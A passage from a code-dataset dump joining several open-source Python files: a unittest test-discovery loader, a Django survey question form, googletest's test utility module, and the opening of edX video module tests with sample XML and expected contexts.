testFnNames.sort(key=_CmpToKey(self.sortTestMethodsUsing))
return testFnNames
def discover(self, start_dir, pattern='test*.py', top_level_dir=None):
"""Find and return all test modules from the specified start
directory, recursing into subdirectories to find them. Only test files
that match the pattern will be loaded. (Using shell style pattern
matching.)
All test modules must be importable from the top level of the project.
If the start directory is not the top level directory then the top
level directory must be specified separately.
If a test package name (directory with '__init__.py') matches the
pattern then the package will be checked for a 'load_tests' function. If
this exists then it will be called with loader, tests, pattern.
If load_tests exists then discovery does *not* recurse into the package,
load_tests is responsible for loading all tests in the package.
The pattern is deliberately not stored as a loader attribute so that
packages can continue discovery themselves. top_level_dir is stored so
load_tests does not need to pass this argument in to loader.discover().
"""
set_implicit_top = False
if top_level_dir is None and self._top_level_dir is not None:
# make top_level_dir optional if called from load_tests in a package
top_level_dir = self._top_level_dir
elif top_level_dir is None:
set_implicit_top = True
top_level_dir = start_dir
top_level_dir = os.path.abspath(top_level_dir)
if not top_level_dir in sys.path:
# all test modules must be importable from the top level directory
# should we *unconditionally* put the start directory in first
# in sys.path to minimise likelihood of conflicts between installed
# modules and development versions?
sys.path.insert(0, top_level_dir)
self._top_level_dir = top_level_dir
is_not_importable = False
if os.path.isdir(os.path.abspath(start_dir)):
start_dir = os.path.abspath(start_dir)
if start_dir != top_level_dir:
is_not_importable = not os.path.isfile(os.path.join(start_dir, '__init__.py'))
else:
# support for discovery from dotted module names
try:
__import__(start_dir)
except ImportError:
is_not_importable = True
else:
the_module = sys.modules[start_dir]
top_part = start_dir.split('.')[0]
start_dir = os.path.abspath(os.path.dirname((the_module.__file__)))
if set_implicit_top:
self._top_level_dir = os.path.abspath(os.path.dirname(os.path.dirname(sys.modules[top_part].__file__)))
sys.path.remove(top_level_dir)
if is_not_importable:
raise ImportError('Start directory is not importable: %r' % start_dir)
tests = list(self._find_tests(start_dir, pattern))
return self.suiteClass(tests)
def _get_name_from_path(self, path):
path = os.path.splitext(os.path.normpath(path))[0]
_relpath = relpath(path, self._top_level_dir)
assert not os.path.isabs(_relpath), "Path must be within the project"
assert not _relpath.startswith('..'), "Path must be within the project"
name = _relpath.replace(os.path.sep, '.')
return name
def _get_module_from_name(self, name):
__import__(name)
return sys.modules[name]
def _match_path(self, path, full_path, pattern):
# override this method to use alternative matching strategy
return fnmatch(path, pattern)
def _find_tests(self, start_dir, pattern):
"""Used by discovery. Yields test suites it loads."""
paths = os.listdir(start_dir)
for path in paths:
full_path = os.path.join(start_dir, path)
if os.path.isfile(full_path):
if not VALID_MODULE_NAME.match(path):
# valid Python identifiers only
continue
if not self._match_path(path, full_path, pattern):
continue
# if the test file matches, load it
name = self._get_name_from_path(full_path)
try:
module = self._get_module_from_name(name)
except:
yield _make_failed_import_test(name, self.suiteClass)
else:
mod_file = os.path.abspath(getattr(module, '__file__', full_path))
realpath = os.path.splitext(mod_file)[0]
fullpath_noext = os.path.splitext(full_path)[0]
if realpath.lower() != fullpath_noext.lower():
module_dir = os.path.dirname(realpath)
mod_name = os.path.splitext(os.path.basename(full_path))[0]
expected_dir = os.path.dirname(full_path)
msg = ("%r module incorrectly imported from %r. Expected %r. "
"Is this module globally installed?")
raise ImportError(msg % (mod_name, module_dir, expected_dir))
yield self.loadTestsFromModule(module)
elif os.path.isdir(full_path):
if not os.path.isfile(os.path.join(full_path, '__init__.py')):
continue
load_tests = None
tests = None
if fnmatch(path, pattern):
# only check load_tests if the package directory itself matches the filter
name = self._get_name_from_path(full_path)
package = self._get_module_from_name(name)
load_tests = getattr(package, 'load_tests', None)
tests = self.loadTestsFromModule(package, use_load_tests=False)
if load_tests is None:
if tests is not None:
# tests loaded from package file
yield tests
# recurse into the package
for test in self._find_tests(full_path, pattern):
yield test
else:
try:
yield load_tests(self, tests, pattern)
except Exception as e:
yield _make_failed_load_tests(package.__name__, e,
self.suiteClass)
defaultTestLoader = TestLoader()
def _makeLoader(prefix, sortUsing, suiteClass=None):
loader = TestLoader()
loader.sortTestMethodsUsing = sortUsing
loader.testMethodPrefix = prefix
if suiteClass:
loader.suiteClass = suiteClass
return loader
def getTestCaseNames(testCaseClass, prefix, sortUsing=cmp):
return _makeLoader(prefix, sortUsing).getTestCaseNames(testCaseClass)
def makeSuite(testCaseClass, prefix='test', sortUsing=cmp,
suiteClass=suite.TestSuite):
return _makeLoader(prefix, sortUsing, suiteClass).loadTestsFromTestCase(testCaseClass)
def findTestCases(module, prefix='test', sortUsing=cmp,
suiteClass=suite.TestSuite):
return _makeLoader(prefix, sortUsing, suiteClass).loadTestsFromModule(module)
| bsd-3-clause |
prathapsridharan/health_project | health_project/questions/forms.py | 1 | 2744 | """Contains form class defintions for form for the questions app.
Classes: [
SurveyQuestionForm
]
"""
from django import forms
from django.core.urlresolvers import reverse
from crispy_forms.bootstrap import FormActions
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit, Layout
from . import config
from .models import ChoiceSelectionAnswerFormat, ListInputAnswerFormat
class SurveyQuestionForm(forms.Form):
"""Models a form for how a question should be posed to the user."""
answer_input = forms.CharField(
label = "",
required=False,
widget=forms.Textarea()
)
class Meta:
fields = ("answer_input")
def __init__(self, *args, **kwargs):
survey_question = kwargs.pop('survey_question', None)
super().__init__(*args, **kwargs)
# NOTE: It is assumed that all answer_formats belonging to a question
# is of the same type.
# TODO: ENHANCEMENT: Enforce same answer format instances or throw an
# error
answer_formats = survey_question.question.answer_formats.all()
answer_format = answer_formats[0]
# Determine what the type of 'answer_input' form field is and its
# associated widget type.
if isinstance(answer_format, ChoiceSelectionAnswerFormat):
choices = ((a.id, a.choice_name) for a in answer_formats)
label = ""
required = False
if (answer_format.answer_format_type == config.CHOICE_SELECTION_MANY_FORMAT):
self.fields['answer_input'] = forms.MultipleChoiceField(
label=label,
required=required,
choices=choices
)
self.fields['answer_input'].widget = forms.CheckboxSelectMultiple()
else:
self.fields['answer_input'] = forms.ChoiceField(
label=label,
required=required,
choices=choices
)
self.fields['answer_input'].widget = forms.RadioSelect()
elif isinstance(answer_format, ListInputAnswerFormat):
self.fields['answer_input'].help_text = "Please enter each new item on a new line."
self.helper = FormHelper()
self.helper.form_class = 'form-horizontal'
self.helper.form_method = 'post'
self.helper.form_action = reverse("questions:answer-survey-question")
self.helper.layout = Layout(
'answer_input',
)
self.helper.layout.append(
FormActions(
Submit('skip', 'Skip'),
Submit('submit', 'Submit', css_class='btn-primary'),
)
)
| bsd-3-clause |
christofferpettersson/Aftermath | Code/External/googletest/test/gtest_test_utils.py | 674 | 10826 | #!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test utilities for Google C++ Testing Framework."""
__author__ = 'wan@google.com (Zhanyong Wan)'
import atexit
import os
import shutil
import sys
import tempfile
import unittest
_test_module = unittest
# Suppresses the 'Import not at the top of the file' lint complaint.
# pylint: disable-msg=C6204
try:
import subprocess
_SUBPROCESS_MODULE_AVAILABLE = True
except:
import popen2
_SUBPROCESS_MODULE_AVAILABLE = False
# pylint: enable-msg=C6204
GTEST_OUTPUT_VAR_NAME = 'GTEST_OUTPUT'
IS_WINDOWS = os.name == 'nt'
IS_CYGWIN = os.name == 'posix' and 'CYGWIN' in os.uname()[0]
# The environment variable for specifying the path to the premature-exit file.
PREMATURE_EXIT_FILE_ENV_VAR = 'TEST_PREMATURE_EXIT_FILE'
environ = os.environ.copy()
def SetEnvVar(env_var, value):
"""Sets/unsets an environment variable to a given value."""
if value is not None:
environ[env_var] = value
elif env_var in environ:
del environ[env_var]
# Here we expose a class from a particular module, depending on the
# environment. The comment suppresses the 'Invalid variable name' lint
# complaint.
TestCase = _test_module.TestCase # pylint: disable-msg=C6409
# Initially maps a flag to its default value. After
# _ParseAndStripGTestFlags() is called, maps a flag to its actual value.
_flag_map = {'source_dir': os.path.dirname(sys.argv[0]),
'build_dir': os.path.dirname(sys.argv[0])}
_gtest_flags_are_parsed = False
def _ParseAndStripGTestFlags(argv):
"""Parses and strips Google Test flags from argv. This is idempotent."""
# Suppresses the lint complaint about a global variable since we need it
# here to maintain module-wide state.
global _gtest_flags_are_parsed # pylint: disable-msg=W0603
if _gtest_flags_are_parsed:
return
_gtest_flags_are_parsed = True
for flag in _flag_map:
# The environment variable overrides the default value.
if flag.upper() in os.environ:
_flag_map[flag] = os.environ[flag.upper()]
# The command line flag overrides the environment variable.
i = 1 # Skips the program name.
while i < len(argv):
prefix = '--' + flag + '='
if argv[i].startswith(prefix):
_flag_map[flag] = argv[i][len(prefix):]
del argv[i]
break
else:
# We don't increment i in case we just found a --gtest_* flag
# and removed it from argv.
i += 1
def GetFlag(flag):
"""Returns the value of the given flag."""
# In case GetFlag() is called before Main(), we always call
# _ParseAndStripGTestFlags() here to make sure the --gtest_* flags
# are parsed.
_ParseAndStripGTestFlags(sys.argv)
return _flag_map[flag]
def GetSourceDir():
"""Returns the absolute path of the directory where the .py files are."""
return os.path.abspath(GetFlag('source_dir'))
def GetBuildDir():
"""Returns the absolute path of the directory where the test binaries are."""
return os.path.abspath(GetFlag('build_dir'))
_temp_dir = None
def _RemoveTempDir():
if _temp_dir:
shutil.rmtree(_temp_dir, ignore_errors=True)
atexit.register(_RemoveTempDir)
def GetTempDir():
"""Returns a directory for temporary files."""
global _temp_dir
if not _temp_dir:
_temp_dir = tempfile.mkdtemp()
return _temp_dir
def GetTestExecutablePath(executable_name, build_dir=None):
"""Returns the absolute path of the test binary given its name.
The function will print a message and abort the program if the resulting file
doesn't exist.
Args:
executable_name: name of the test binary that the test script runs.
build_dir: directory where to look for executables, by default
the result of GetBuildDir().
Returns:
The absolute path of the test binary.
"""
path = os.path.abspath(os.path.join(build_dir or GetBuildDir(),
executable_name))
if (IS_WINDOWS or IS_CYGWIN) and not path.endswith('.exe'):
path += '.exe'
if not os.path.exists(path):
message = (
'Unable to find the test binary "%s". Please make sure to provide\n'
'a path to the binary via the --build_dir flag or the BUILD_DIR\n'
'environment variable.' % path)
print >> sys.stderr, message
sys.exit(1)
return path
def GetExitStatus(exit_code):
"""Returns the argument to exit(), or -1 if exit() wasn't called.
Args:
exit_code: the result value of os.system(command).
"""
if os.name == 'nt':
# On Windows, os.WEXITSTATUS() doesn't work and os.system() returns
# the argument to exit() directly.
return exit_code
else:
# On Unix, os.WEXITSTATUS() must be used to extract the exit status
# from the result of os.system().
if os.WIFEXITED(exit_code):
return os.WEXITSTATUS(exit_code)
else:
return -1
class Subprocess:
def __init__(self, command, working_dir=None, capture_stderr=True, env=None):
"""Changes into a specified directory, if provided, and executes a command.
Restores the old directory afterwards.
Args:
command: The command to run, in the form of sys.argv.
working_dir: The directory to change into.
capture_stderr: Determines whether to capture stderr in the output member
or to discard it.
env: Dictionary with environment to pass to the subprocess.
Returns:
An object that represents outcome of the executed process. It has the
following attributes:
terminated_by_signal True iff the child process has been terminated
by a signal.
signal Sygnal that terminated the child process.
exited True iff the child process exited normally.
exit_code The code with which the child process exited.
output Child process's stdout and stderr output
combined in a string.
"""
# The subprocess module is the preferrable way of running programs
# since it is available and behaves consistently on all platforms,
# including Windows. But it is only available starting in python 2.4.
# In earlier python versions, we revert to the popen2 module, which is
# available in python 2.0 and later but doesn't provide required
# functionality (Popen4) under Windows. This allows us to support Mac
# OS X 10.4 Tiger, which has python 2.3 installed.
if _SUBPROCESS_MODULE_AVAILABLE:
if capture_stderr:
stderr = subprocess.STDOUT
else:
stderr = subprocess.PIPE
p = subprocess.Popen(command,
stdout=subprocess.PIPE, stderr=stderr,
cwd=working_dir, universal_newlines=True, env=env)
# communicate returns a tuple with the file obect for the child's
# output.
self.output = p.communicate()[0]
self._return_code = p.returncode
else:
old_dir = os.getcwd()
def _ReplaceEnvDict(dest, src):
# Changes made by os.environ.clear are not inheritable by child
# processes until Python 2.6. To produce inheritable changes we have
# to delete environment items with the del statement.
for key in dest.keys():
del dest[key]
dest.update(src)
# When 'env' is not None, backup the environment variables and replace
# them with the passed 'env'. When 'env' is None, we simply use the
# current 'os.environ' for compatibility with the subprocess.Popen
# semantics used above.
if env is not None:
old_environ = os.environ.copy()
_ReplaceEnvDict(os.environ, env)
try:
if working_dir is not None:
os.chdir(working_dir)
if capture_stderr:
p = popen2.Popen4(command)
else:
p = popen2.Popen3(command)
p.tochild.close()
self.output = p.fromchild.read()
ret_code = p.wait()
finally:
os.chdir(old_dir)
# Restore the old environment variables
# if they were replaced.
if env is not None:
_ReplaceEnvDict(os.environ, old_environ)
# Converts ret_code to match the semantics of
# subprocess.Popen.returncode.
if os.WIFSIGNALED(ret_code):
self._return_code = -os.WTERMSIG(ret_code)
else: # os.WIFEXITED(ret_code) should return True here.
self._return_code = os.WEXITSTATUS(ret_code)
if self._return_code < 0:
self.terminated_by_signal = True
self.exited = False
self.signal = -self._return_code
else:
self.terminated_by_signal = False
self.exited = True
self.exit_code = self._return_code
def Main():
"""Runs the unit test."""
# We must call _ParseAndStripGTestFlags() before calling
# unittest.main(). Otherwise the latter will be confused by the
# --gtest_* flags.
_ParseAndStripGTestFlags(sys.argv)
# The tested binaries should not be writing XML output files unless the
# script explicitly instructs them to.
# TODO(vladl@google.com): Move this into Subprocess when we implement
# passing environment into it as a parameter.
if GTEST_OUTPUT_VAR_NAME in os.environ:
del os.environ[GTEST_OUTPUT_VAR_NAME]
_test_module.main()
| mit |
Edraak/edraak-platform | lms/djangoapps/courseware/tests/test_video_mongo.py | 8 | 91387 | # -*- coding: utf-8 -*-
"""
Video xmodule tests in mongo.
"""
import json
from collections import OrderedDict
from uuid import uuid4
from tempfile import mkdtemp
import shutil
import ddt
from django.conf import settings
from django.core.files import File
from django.core.files.base import ContentFile
from django.test import TestCase
from django.test.utils import override_settings
from fs.osfs import OSFS
from fs.path import combine
from edxval.api import (
ValCannotCreateError,
ValVideoNotFoundError,
create_video_transcript,
create_or_update_video_transcript,
create_profile,
create_video,
get_video_info,
get_video_transcript,
get_video_transcript_data
)
from edxval.utils import create_file_in_fs
from lxml import etree
from mock import MagicMock, Mock, patch
from nose.plugins.attrib import attr
from path import Path as path
from xmodule.contentstore.content import StaticContent
from xmodule.exceptions import NotFoundError
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.inheritance import own_metadata
from xmodule.modulestore.tests.django_utils import TEST_DATA_MONGO_MODULESTORE, TEST_DATA_SPLIT_MODULESTORE
from xmodule.tests.test_import import DummySystem
from xmodule.tests.test_video import VideoDescriptorTestBase, instantiate_descriptor
from xmodule.video_module import VideoDescriptor, bumper_utils, rewrite_video_url, video_utils
from xmodule.video_module.transcripts_utils import Transcript, save_to_store, subs_filename
from xmodule.video_module.video_module import EXPORT_IMPORT_STATIC_DIR, EXPORT_IMPORT_COURSE_DIR
from xmodule.x_module import STUDENT_VIEW
from .helpers import BaseTestXmodule
from .test_video_handlers import TestVideo
from .test_video_xml import SOURCE_XML
MODULESTORES = {
ModuleStoreEnum.Type.mongo: TEST_DATA_MONGO_MODULESTORE,
ModuleStoreEnum.Type.split: TEST_DATA_SPLIT_MODULESTORE,
}
TRANSCRIPT_FILE_SRT_DATA = u"""
1
00:00:14,370 --> 00:00:16,530
I am overwatch.
2
00:00:16,500 --> 00:00:18,600
可以用“我不太懂艺术 但我知道我喜欢什么”做比喻.
"""
TRANSCRIPT_FILE_SJSON_DATA = """{\n "start": [10],\n "end": [100],\n "text": ["Hi, welcome to edxval."]\n}"""
@attr(shard=7)
class TestVideoYouTube(TestVideo):
METADATA = {}
def test_video_constructor(self):
"""Make sure that all parameters extracted correctly from xml"""
context = self.item_descriptor.render(STUDENT_VIEW).content
sources = [u'example.mp4', u'example.webm']
expected_context = {
'autoadvance_enabled': False,
'branding_info': None,
'license': None,
'bumper_metadata': 'null',
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': u'example.mp4',
'handout': None,
'id': self.item_descriptor.location.html_id(),
'metadata': json.dumps(OrderedDict({
'autoAdvance': False,
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'autoplay': False,
'streams': '0.75:jNCf2gIqpeE,1.00:ZwkTiUPN0mg,1.25:rsq9auxASqI,1.50:kMyNdzVHHgg',
'sources': sources,
'duration': None,
'poster': None,
'captionDataDir': None,
'showCaptions': 'true',
'generalSpeed': 1.0,
'speed': None,
'savedVideoPosition': 0.0,
'start': 3603.0,
'end': 3610.0,
'transcriptLanguage': 'en',
'transcriptLanguages': OrderedDict({'en': 'English', 'uk': u'Українська'}),
'ytTestTimeout': 1500,
'ytApiUrl': 'https://www.youtube.com/iframe_api',
'ytMetadataUrl': 'https://www.googleapis.com/youtube/v3/videos/',
'ytKey': None,
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'autohideHtml5': False,
'recordedYoutubeIsAvailable': True,
'completionEnabled': False,
'completionPercentage': 0.95,
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
})),
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': 'null',
}
self.assertEqual(
context,
self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context),
)
@attr(shard=7)
class TestVideoNonYouTube(TestVideo):
"""Integration tests: web client + mongo."""
DATA = """
<video show_captions="true"
display_name="A Name"
sub="a_sub_file.srt.sjson"
download_video="true"
start_time="01:00:03" end_time="01:00:10"
>
<source src="example.mp4"/>
<source src="example.webm"/>
</video>
"""
MODEL_DATA = {
'data': DATA,
}
METADATA = {}
def test_video_constructor(self):
"""Make sure that if the 'youtube' attribute is omitted in XML, then
the template generates an empty string for the YouTube streams.
"""
context = self.item_descriptor.render(STUDENT_VIEW).content
sources = [u'example.mp4', u'example.webm']
expected_context = {
'autoadvance_enabled': False,
'branding_info': None,
'license': None,
'bumper_metadata': 'null',
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': u'example.mp4',
'handout': None,
'id': self.item_descriptor.location.html_id(),
'metadata': json.dumps(OrderedDict({
'autoAdvance': False,
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'autoplay': False,
'streams': '1.00:3_yD_cEKoCk',
'sources': sources,
'duration': None,
'poster': None,
'captionDataDir': None,
'showCaptions': 'true',
'generalSpeed': 1.0,
'speed': None,
'savedVideoPosition': 0.0,
'start': 3603.0,
'end': 3610.0,
'transcriptLanguage': 'en',
'transcriptLanguages': OrderedDict({'en': 'English'}),
'ytTestTimeout': 1500,
'ytApiUrl': 'https://www.youtube.com/iframe_api',
'ytMetadataUrl': 'https://www.googleapis.com/youtube/v3/videos/',
'ytKey': None,
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'autohideHtml5': False,
'recordedYoutubeIsAvailable': True,
'completionEnabled': False,
'completionPercentage': 0.95,
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
})),
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': 'null',
}
self.assertEqual(
context,
self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context),
)
@attr(shard=7)
@ddt.ddt
class TestGetHtmlMethod(BaseTestXmodule):
'''
Make sure that `get_html` works correctly.
'''
CATEGORY = "video"
DATA = SOURCE_XML
METADATA = {}
def setUp(self):
super(TestGetHtmlMethod, self).setUp()
self.setup_course()
self.default_metadata_dict = OrderedDict({
'autoAdvance': False,
'saveStateUrl': '',
'autoplay': settings.FEATURES.get('AUTOPLAY_VIDEOS', True),
'streams': '1.00:3_yD_cEKoCk',
'sources': '[]',
'duration': 111.0,
'poster': None,
'captionDataDir': None,
'showCaptions': 'true',
'generalSpeed': 1.0,
'speed': None,
'savedVideoPosition': 0.0,
'start': 3603.0,
'end': 3610.0,
'transcriptLanguage': 'en',
'transcriptLanguages': OrderedDict({'en': 'English'}),
'ytTestTimeout': 1500,
'ytApiUrl': 'https://www.youtube.com/iframe_api',
'ytMetadataUrl': 'https://www.googleapis.com/youtube/v3/videos/',
'ytKey': None,
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'autohideHtml5': False,
'recordedYoutubeIsAvailable': True,
'completionEnabled': False,
'completionPercentage': 0.95,
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
})
def get_handler_url(self, handler, suffix):
"""
Return the URL for the specified handler on the block represented by
self.item_descriptor.
"""
return self.item_descriptor.xmodule_runtime.handler_url(
self.item_descriptor, handler, suffix
).rstrip('/?')
def test_get_html_track(self):
SOURCE_XML = """
<video show_captions="true"
display_name="A Name"
sub="{sub}" download_track="{download_track}"
start_time="01:00:03" end_time="01:00:10" download_video="true"
>
<source src="example.mp4"/>
<source src="example.webm"/>
{track}
{transcripts}
</video>
"""
cases = [
{
'download_track': u'true',
'track': u'<track src="http://www.example.com/track"/>',
'sub': u'a_sub_file.srt.sjson',
'expected_track_url': u'http://www.example.com/track',
'transcripts': '',
},
{
'download_track': u'true',
'track': u'',
'sub': u'a_sub_file.srt.sjson',
'expected_track_url': u'a_sub_file.srt.sjson',
'transcripts': '',
},
{
'download_track': u'true',
'track': u'',
'sub': u'',
'expected_track_url': None,
'transcripts': '',
},
{
'download_track': u'false',
'track': u'<track src="http://www.example.com/track"/>',
'sub': u'a_sub_file.srt.sjson',
'expected_track_url': None,
'transcripts': '',
},
{
'download_track': u'true',
'track': u'',
'sub': u'',
'expected_track_url': u'a_sub_file.srt.sjson',
'transcripts': '<transcript language="uk" src="ukrainian.srt" />',
},
]
sources = [u'example.mp4', u'example.webm']
expected_context = {
'autoadvance_enabled': False,
'branding_info': None,
'license': None,
'bumper_metadata': 'null',
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': u'example.mp4',
'handout': None,
'id': self.item_descriptor.location.html_id(),
'metadata': '',
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': 'null',
}
for data in cases:
metadata = self.default_metadata_dict
metadata['sources'] = sources
metadata['duration'] = None
DATA = SOURCE_XML.format(
download_track=data['download_track'],
track=data['track'],
sub=data['sub'],
transcripts=data['transcripts'],
)
self.initialize_module(data=DATA)
track_url = self.get_handler_url('transcript', 'download')
context = self.item_descriptor.render(STUDENT_VIEW).content
metadata.update({
'transcriptLanguages': {"en": "English"} if not data['transcripts'] else {"uk": u'Українська'},
'transcriptLanguage': u'en' if not data['transcripts'] or data.get('sub') else u'uk',
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
})
expected_context.update({
'transcript_download_format': (
None if self.item_descriptor.track and self.item_descriptor.download_track else u'srt'
),
'track': (
track_url if data['expected_track_url'] == u'a_sub_file.srt.sjson' else data['expected_track_url']
),
'id': self.item_descriptor.location.html_id(),
'metadata': json.dumps(metadata)
})
self.assertEqual(
context,
self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context),
)
def test_get_html_source(self):
SOURCE_XML = """
<video show_captions="true"
display_name="A Name"
sub="a_sub_file.srt.sjson" source="{source}"
download_video="{download_video}"
start_time="01:00:03" end_time="01:00:10"
>
{sources}
</video>
"""
cases = [
# self.download_video == True
{
'download_video': 'true',
'source': 'example_source.mp4',
'sources': """
<source src="example.mp4"/>
<source src="example.webm"/>
""",
'result': {
'download_video_link': u'example_source.mp4',
'sources': [u'example.mp4', u'example.webm'],
},
},
{
'download_video': 'true',
'source': '',
'sources': """
<source src="example.mp4"/>
<source src="example.webm"/>
""",
'result': {
'download_video_link': u'example.mp4',
'sources': [u'example.mp4', u'example.webm'],
},
},
{
'download_video': 'true',
'source': '',
'sources': [],
'result': {},
},
# self.download_video == False
{
'download_video': 'false',
'source': 'example_source.mp4',
'sources': """
<source src="example.mp4"/>
<source src="example.webm"/>
""",
'result': {
'sources': [u'example.mp4', u'example.webm'],
},
},
]
initial_context = {
'autoadvance_enabled': False,
'branding_info': None,
'license': None,
'bumper_metadata': 'null',
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': u'example.mp4',
'handout': None,
'id': self.item_descriptor.location.html_id(),
'metadata': self.default_metadata_dict,
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': 'null',
}
initial_context['metadata']['duration'] = None
for data in cases:
DATA = SOURCE_XML.format(
download_video=data['download_video'],
source=data['source'],
sources=data['sources']
)
self.initialize_module(data=DATA)
context = self.item_descriptor.render(STUDENT_VIEW).content
expected_context = dict(initial_context)
expected_context['metadata'].update({
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'sources': data['result'].get('sources', []),
})
expected_context.update({
'id': self.item_descriptor.location.html_id(),
'download_video_link': data['result'].get('download_video_link'),
'metadata': json.dumps(expected_context['metadata'])
})
self.assertEqual(
context,
self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context)
)
def test_get_html_with_non_existent_edx_video_id(self):
"""
Tests the VideoModule get_html where a edx_video_id is given but a video is not found
"""
SOURCE_XML = """
<video show_captions="true"
display_name="A Name"
sub="a_sub_file.srt.sjson" source="{source}"
download_video="{download_video}"
start_time="01:00:03" end_time="01:00:10"
edx_video_id="{edx_video_id}"
>
{sources}
</video>
"""
no_video_data = {
'download_video': 'true',
'source': 'example_source.mp4',
'sources': """
<source src="example.mp4"/>
<source src="example.webm"/>
""",
'edx_video_id': "meow",
'result': {
'download_video_link': u'example_source.mp4',
'sources': [u'example.mp4', u'example.webm'],
}
}
DATA = SOURCE_XML.format(
download_video=no_video_data['download_video'],
source=no_video_data['source'],
sources=no_video_data['sources'],
edx_video_id=no_video_data['edx_video_id']
)
self.initialize_module(data=DATA)
# Referencing a non-existent VAL ID in courseware won't cause an error --
# it'll just fall back to the values in the VideoDescriptor.
self.assertIn("example_source.mp4", self.item_descriptor.render(STUDENT_VIEW).content)
def test_get_html_with_mocked_edx_video_id(self):
SOURCE_XML = """
<video show_captions="true"
display_name="A Name"
sub="a_sub_file.srt.sjson" source="{source}"
download_video="{download_video}"
start_time="01:00:03" end_time="01:00:10"
edx_video_id="{edx_video_id}"
>
{sources}
</video>
"""
data = {
# test with download_video set to false and make sure download_video_link is not set (is None)
'download_video': 'false',
'source': 'example_source.mp4',
'sources': """
<source src="example.mp4"/>
<source src="example.webm"/>
""",
'edx_video_id': "mock item",
'result': {
'download_video_link': None,
# make sure the desktop_mp4 url is included as part of the alternative sources.
'sources': [u'example.mp4', u'example.webm', u'http://www.meowmix.com'],
}
}
# Video found for edx_video_id
metadata = self.default_metadata_dict
metadata['autoplay'] = False
metadata['sources'] = ""
initial_context = {
'autoadvance_enabled': False,
'branding_info': None,
'license': None,
'bumper_metadata': 'null',
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': u'example.mp4',
'handout': None,
'id': self.item_descriptor.location.html_id(),
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': 'null',
'metadata': metadata
}
DATA = SOURCE_XML.format(
download_video=data['download_video'],
source=data['source'],
sources=data['sources'],
edx_video_id=data['edx_video_id']
)
self.initialize_module(data=DATA)
with patch('edxval.api.get_video_info') as mock_get_video_info:
mock_get_video_info.return_value = {
